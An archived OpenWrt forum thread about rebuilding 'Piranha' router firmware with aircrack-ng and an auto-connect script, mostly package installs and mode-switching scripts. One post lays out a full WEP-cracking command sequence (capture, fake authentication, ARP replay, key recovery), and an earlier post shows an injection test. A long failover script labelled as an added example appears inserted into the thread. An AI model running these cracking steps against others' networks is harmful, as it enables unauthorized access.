OpenWrt Forum Archive

Topic: Atheros only! - Next Generation Piranha firmware (v4) + AAP (v3)

The content of this topic has been archived between 20 Aug 2015 and 21 Apr 2018. Unfortunately there are posts – most likely complete pages – missing.

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

(Last edited by technocrat on 12 Feb 2012, 16:43)

Right on ....

technocrat wrote:

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

Thank you very much for this update.

Let us know how the testing goes with injection and capture. Are you able to defeat WEP as quickly as on a normal PC ( experimenting on your own devices of course ) ?

I am using a wndr3700 and would like to be able to get aap to work on it. How close is V4?
I appreciate the effort you guys have put into this project. Keep up the great work.

I found this command to test injection.  Here is my result:

root@OpenWrt:~# aireplay-ng -9 ath0
10:23:02  Trying broadcast probe requests...
10:23:02  Injection is working!
10:23:04  Found 4 APs

I am still working on the WEP test.

I have some questions for you technocrat :

-is the CPU of the device powerful enough to hack the WEP algorithm or do you need to use a desktop for that ?

-is there enough local storage for the packets or do you need to use a network HDD for storage ?

-do you need to use screen for multiple commands at the same time in the terminal ?

-do you need to use the aircrack-ng function of emulating the wireless adapter over TCP / IP ( passthrough function of airserv-ng ) ?

Thanks and please report on your progress. This is very interesting !

-is the CPU of the device powerful enough to hack the WEP algorithm or do you need to use a desktop for that ?

A desktop CPU certainly is much more powerful, but it works. I'd recommend using aircrack-ptw instead of aircrack-ng (it crashes less frequently).

-is there enough local storage for the packets or do you need to use a network HDD for storage ?

There isn't enough space. Use CIFS storage for capturing.

-do you need to use screen for multiple commands at the same time in the terminal ?

Yes. Otherwise you need to open several SSH sessions. Using screen you can even detach the session.

-do you need to use the aircrack-ng function of emulating the wireless adapter over TCP / IP ( passthrough function of airserv-ng ) ?

Nope. The router is self-sustaining, i.e. at least capable of doing it without the desktop, apart from the CIFS storage. You may use airserv-ng though. You need kmod-tun afaik.

xadonxander wrote:

I am using a wndr3700 and would like to be able to get aap to work on it. How close is V4?
I appreciate the effort you guys have put into this project. Keep up the great work.

WNDR3700 is ath9k, i.e. mac80211 or what is it? If so, you'll need to wait for next AAP. AAP v3 is madwifi-ng only. I'm working (behind the scenes so to speak) on "mac80211-AAP" (this will solve many problems, e.g. no more patching, truncated SSIDs, etc.) but I won't promise ETAs etc. Have done this in the past without actually delivering due to "too much on the plate".

(Last edited by orange on 24 Feb 2012, 17:04)

I have done this with Piranha on the Fon 2100 (original).  You need to open two ssh sessions to the router and issue the commands.  The instructions I read online a while back stated that you need to collect about 60000 packets, so I use that as a rough guide.  I noticed my capture file was about 2-3MB with about that many packets.  If you have enough space on your router, you can use it for storage.  Otherwise see below on how to mount a network share (I used a Windows 7 share).

I am not sure what screen does :-)  I did a package compare between a Fon 2100 Piranha v4 and my base EOC-5610 OpenWRT 10.03.1 install and installed the missing packages that I listed in post #251.

The commands I used are listed below.  You may want to cross reference this with another tutorial.  I am fairly new to aircrack-ng and can't use it robustly yet.

ssh 10.0.0.1

mkdir /mnt/share
# mount the share on the directory created above (the capture path below refers to it)
mount.cifs //10.0.0.133/share /mnt/share -o user=username

aap stop
monitor         (to put the router in monitor mode)

# use -c to specify the channel number
airodump-ng -c 6 --bssid <MAC.Address.of.WEP.network> -w /mnt/share/capture ath0

ssh 10.00.221 -l root          (open another ssh session in a new window)
ifconfig                              (find and copy the MAC address of ath0)
aireplay-ng -1 0 -e <ESSID.of.WEP.network> -a <MAC.Address.of.WEP.network> -h <MAC.Address.of.ath0> ath0

aireplay-ng -3  -b  <MAC.Address.of.WEP.network> -h  <MAC.Address.of.ath0> ath0

After you collect enough packets run the aircrack-ptw to see if it can discover the key.
aircrack-ptw /mnt/share/capture-01.cap

(Last edited by technocrat on 24 Feb 2012, 20:29)

technocrat wrote:

I am not sure what screen does :-)

There is a brief writeup about GNU screen (that pretty much explains it) at https://www.linux.com/learn/tutorials/2 … gnu-screen-
The session-detach is particularly useful.

(Last edited by orange on 24 Feb 2012, 23:00)

orange wrote:
xadonxander wrote:

I am using a wndr3700 and would like to be able to get aap to work on it. How close is V4?
I appreciate the effort you guys have put into this project. Keep up the great work.

WNDR3700 is ath9k, i.e. mac80211 or what is it? If so, you'll need to wait for next AAP. AAP v3 is madwifi-ng only. I'm working (behind the scenes so to speak) on "mac80211-AAP" (this will solve many problems, e.g. no more patching, truncated SSIDs, etc.) but I won't promise ETAs etc. Have done this in the past without actually delivering due to "too much on the plate".

I wasn't looking for an exact date, just a roundabout time. It is a mac80211. I don't mess with the routers too much, I stick to PIC based devices most of the time so I don't know the amount of work involved.  Are we close, weeks, months or years from this being possible? I'm just trying to decide to wait it out or buy a new router.

I did get the magicconnect script to work which is OK as I don't need to crack WEP. It has its limitations and I have not figured out how to only use radio0 for the client and radio1 for AP.

Thank you, Keep up the great work! 
Brandon

(Last edited by xadonxander on 25 Feb 2012, 08:19)

technocrat wrote:

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/zlib_1.2.3-5_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/librt_0.9.30.1-43.32_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpthread_0.9.30.1-43.32_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libopenssl_0.9.8r-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpcap_1.0.0-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ng_1.1-3_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ptw_1.0.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-tun_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libreadline_5.2-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libncurses_5.7-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/cifsmount_1.5-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/macchanger_1.5.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-nls-base_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-fs-cifs_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/screen_4.0.3-2_atheros.ipk

I had to install a dependency for libpthread

Does the setup need external root or is the NAND big enough?

Might be an idea to put the captures on exroot ?

I couldn't get this to work correctly with a vap on my fonera. Borg box worked for a second but it would randomly reboot.

r3dsk1n wrote:

I couldn't get this to work correctly with a vap on my fonera. Borg box worked for a second but it would randomly reboot.

Which version of the fon was this on ?

Thanks !

2100

Has anyone thought about using a simple form of WAN failover on this firmware ?

Maybe switch between different APs when one does not ping through etc. ?

bulanula wrote:

Has anyone thought about using a simple form of WAN failover on this firmware ?

Maybe switch between different APs when one does not ping through etc. ?

?? Maybe I don't understand your question, but what you're requesting actually is THE fundamental functionality of AAP *confused*, i.e. the reason it's there.

orange wrote:
bulanula wrote:

Has anyone thought about using a simple form of WAN failover on this firmware ?

Maybe switch between different APs when one does not ping through etc. ?

?? Maybe I don't understand your question, but what you're requesting actually is THE fundamental functionality of AAP *confused*, i.e. the reason it's there.

I was asking about a form of this software here : http://eko.one.pl/?p=openwrt-simplefailover

But it must do this with gateways on the LAN and also wireless AP gateways.

Basically, the AAP does this only with the wireless interfaces but can you somehow do it with all 3 maybe :

-wireless
-3g modem
-wired

for ultimate redundancy solution ?

Thank you !
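An added example of the multi-uplink check bulanula is asking about (this is not AAP's own code, nor the simplefailover script linked above): candidates are probed in priority order and the default route is re-pointed at the first gateway that answers. The probe function is passed in by name so the selection logic can be exercised without a network; interface names and gateway addresses are constructed assumptions.

```shell
#!/bin/sh
# Priority-ordered uplink failover for wired, 3G and wireless candidates.
# Candidate format: "label:interface:gateway" (names/addresses are assumptions).

# Probe one uplink by pinging its gateway out of the given interface.
# $1 = interface, $2 = gateway. Returns 0 when the gateway answers.
# (busybox ping on OpenWrt supports -I and -W.)
ping_probe() {
    ping -c 1 -W 2 -I "$1" "$2" >/dev/null 2>&1
}

# pick_uplink PROBE_FN CANDIDATE...
# Tries candidates in the order given, prints the label of the first whose
# gateway passes the probe and returns 0. Returns 1 when none are reachable.
pick_uplink() {
    local probe cand label rest ifname gw
    probe="$1"; shift
    for cand in "$@"; do
        label=${cand%%:*}          # text before the first ':'
        rest=${cand#*:}            # "interface:gateway"
        ifname=${rest%%:*}
        gw=${rest#*:}
        if "$probe" "$ifname" "$gw"; then
            echo "$label"
            return 0
        fi
    done
    return 1
}

# uplink_fields LABEL CANDIDATE...: prints "interface gateway" for LABEL.
uplink_fields() {
    local want cand rest
    want="$1"; shift
    for cand in "$@"; do
        [ "${cand%%:*}" = "$want" ] || continue
        rest=${cand#*:}
        echo "${rest%%:*} ${rest#*:}"
        return 0
    done
    return 1
}

# apply_uplink IFACE GW: point the default route at the chosen gateway.
apply_uplink() {
    route del default 2>/dev/null
    route add default gw "$2" dev "$1"
}

# Main loop: re-evaluate every 30 s, switch only when the best uplink changes.
# Interface names and gateways below are constructed for illustration.
if [ "${1:-}" = "run" ]; then
    CANDS="wired:eth0:192.0.2.1 wifi:ath0:192.0.2.129 3g:ppp0:192.0.2.254"
    current=""
    while :; do
        # shellcheck disable=SC2086  # word splitting of CANDS is intended
        if best=$(pick_uplink ping_probe $CANDS); then
            if [ "$best" != "$current" ]; then
                set -- $(uplink_fields "$best" $CANDS)
                apply_uplink "$1" "$2" && echo "default route now via $best ($2 on $1)"
                current="$best"
            fi
        else
            echo "no uplink reachable"
            current=""
        fi
        sleep 30
    done
fi
```

Save it as e.g. /bin/uplinkwatch and start it with `uplinkwatch run &` (or under screen) on the router.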

r3dsk1n wrote:
technocrat wrote:

I decided to create an updated version of Piranha based on OpenWRT 10.03.1 and orange's updated aap script from post #216.  I have it working by doing the following:
1) Install OpenWRT 10.03.1
2) Install the following packages:

aircrack-ng:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
aircrack-ptw:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
zlib:                    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpthread:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libopenssl:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libpcap:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-tun:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libreadline:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
libncurses:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
cifsmount:            root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
macchanger:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-nls-base:    root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
kmod-fs-cifs:        root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk
screen:                root@OpenWrt:~# opkg install http://downloads.openwrt.org/backfire/1 … theros.ipk

3)  Create the following monitor and sta scripts and chmod 755 both scripts.
-----------------------
/bin/monitor :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode monitor > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode monitor)"

-----------------------
/bin/sta :
-----------------------
#!/bin/sh
ifconfig -a | awk '/ath/ {print $1}' | while read x; do wlanconfig $x destroy; echo "madwifi-ng VAP $x destroyed"; done
wlanconfig ath0 create wlandev wifi0 wlanmode sta > /dev/null
echo "madwifi-ng VAP ath0 created (wlanmode sta)"

4)  Follow orange's instructions in his now infamous post #216.  This will add the last published aap script from orange, its configuration file, and the original Piranha network and wireless configurations.  After editing the network and wireless config files and rebooting, your router will behave like Piranha v4.
https://forum.openwrt.org/viewtopic.php … 97#p140797

So far I have tested the aap, monitor & sta scripts and monitor mode for scanning only.  I haven't tried packet injection or capture yet.

opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/zlib_1.2.3-5_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/librt_0.9.30.1-43.32_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpthread_0.9.30.1-43.32_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libopenssl_0.9.8r-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libpcap_1.0.0-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ng_1.1-3_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/aircrack-ptw_1.0.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-tun_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libreadline_5.2-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/libncurses_5.7-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/cifsmount_1.5-2_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/macchanger_1.5.0-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-nls-base_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/kmod-fs-cifs_2.6.30.10-1_atheros.ipk
opkg install http://downloads.openwrt.org/backfire/10.03.1/atheros/packages/screen_4.0.3-2_atheros.ipk

I had to install a dependency for libpthread

Feel like pulling an image off of the 2100 after it was all installed .... not sure if that's even possible ..

Indeed. I too was wondering if you can somehow "clone" the current installed image to a new image that you can flash on another similar device for backup purposes or easier initialization ???

Thanks !

(Last edited by bulanula on 5 Apr 2012, 12:47)

You could use the OpenWrt source to build an image with all the needed packages and scripts. I might actually do that myself considering I have been looking for something like Piranha for the past 2 days.

orange: Would you mind me building a backfire 10.03.1 version of piranha based on the details provided by technocrat?

Would you have a place to host it?

That was weird ... got an email that there was a new posting ... but nothing new ...

Seth7: i do have a place to host it.

Hopefully I'll be able to test the image I made tonight. If it works, all we need is an OK from orange.